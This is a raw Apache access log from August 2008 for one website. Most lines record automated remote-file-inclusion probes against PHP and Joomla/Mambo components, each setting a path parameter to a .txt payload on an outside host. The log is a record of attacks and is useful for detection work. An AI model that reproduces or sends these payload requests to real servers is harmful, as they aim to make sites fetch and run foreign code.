70.85.208.194 - - [12/Aug/2008:10:00:56 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:10:00:56 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.70.114 - - [12/Aug/2008:10:01:00 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
74.53.70.114 - - [12/Aug/2008:10:01:00 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sonicsr.com/bo.do?? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:01:06 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:01:08 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.153.58 - - [12/Aug/2008:10:01:10 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.22.83.20 - - [12/Aug/2008:10:01:10 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.153.58 - - [12/Aug/2008:10:01:10 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:01:13 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:01:18 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:01:19 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:01:20 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:01:36 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:37 -0700] "GET /logs/access_080126.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:37 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:37 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:37 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:01:38 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:01:38 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:38 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:01:39 -0700] "GET /logs/access_080320.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:01:39 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:01:39 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:01:40 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:41 -0700] "GET /logs/access_080311.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:01:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:10:01:42 -0700] "GET /bikes/dteel/2008_07_03/?M=A HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:01:43 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
200.203.121.1 - - [12/Aug/2008:10:01:50 -0700] "GET //config/dbutil.bck.php?confdir=http://www.abosaopaulo.org.br/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:10:01:50 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.abosaopaulo.org.br/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:02 -0700] "GET /logs/access_080110.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:10:02:02 -0700] "GET //config/dbutil.bck.php?confdir=http://lipuu.com/tool/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Aug/2008:10:02:02 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://lipuu.com/tool/chid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:02:03 -0700] "GET /logs/access_080404.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:02:04 -0700] "GET /logs/index.php?meio=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:02:05 -0700] "GET /logs/access_080404.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:10:02:06 -0700] "GET /index.php?meio=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 200 18371 "-" "libwww-perl/5.64" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:02:07 -0700] "GET /logs/access_080404.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:27 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:27 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:02:30 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:02:30 -0700] "GET /logs//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:02:30 -0700] "GET /logs/access_080207.log//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [12/Aug/2008:10:02:31 -0700] "GET //index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 18431 "-" "libwww-perl/5.810" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:34 -0700] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:37 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:02:37 -0700] "GET /logs/access_080122.log%20//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:02:43 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:43 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:43 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:10:02:44 -0700] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:02:51 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:02:51 -0700] "GET /logs//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:02:52 -0700] "GET /logs/access_080207.log//index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:52 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.74.80 - - [12/Aug/2008:10:02:52 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [12/Aug/2008:10:02:53 -0700] "GET //index.php?pagina=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 200 18431 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:02:55 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:02:55 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:02:56 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:03:29 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:03:29 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:03:40 -0700] "GET /logs/access_080116.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:03:44 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:03:52 -0700] "GET /logs/access_080320.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:03:52 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:03:52 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:01 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:01 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:04:08 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:04:09 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:04:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:04:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:04:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.108 - - [12/Aug/2008:10:04:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:19 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:19 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:04:30 -0700] "GET /logs/access_080124.log%20//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:04:30 -0700] "GET /logs/access_080207.log%20//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:04:30 -0700] "GET /logs/access_080117.log%20//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:33 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:34 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:34 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:34 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:38 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:04:38 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:04:38 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:04:39 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:04:44 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:04:48 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:04:48 -0700] "GET /logs/access_080404.log//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:04:50 -0700] "GET /logs/access_071228.log%20//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:05:03 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:05:03 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:05:03 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:05:08 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:05:11 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:05:11 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:05:15 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.127.68.188 - - [12/Aug/2008:10:05:15 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:05:18 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:05:18 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:05:18 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:05:44 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
72.55.148.240 - - [12/Aug/2008:10:05:44 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
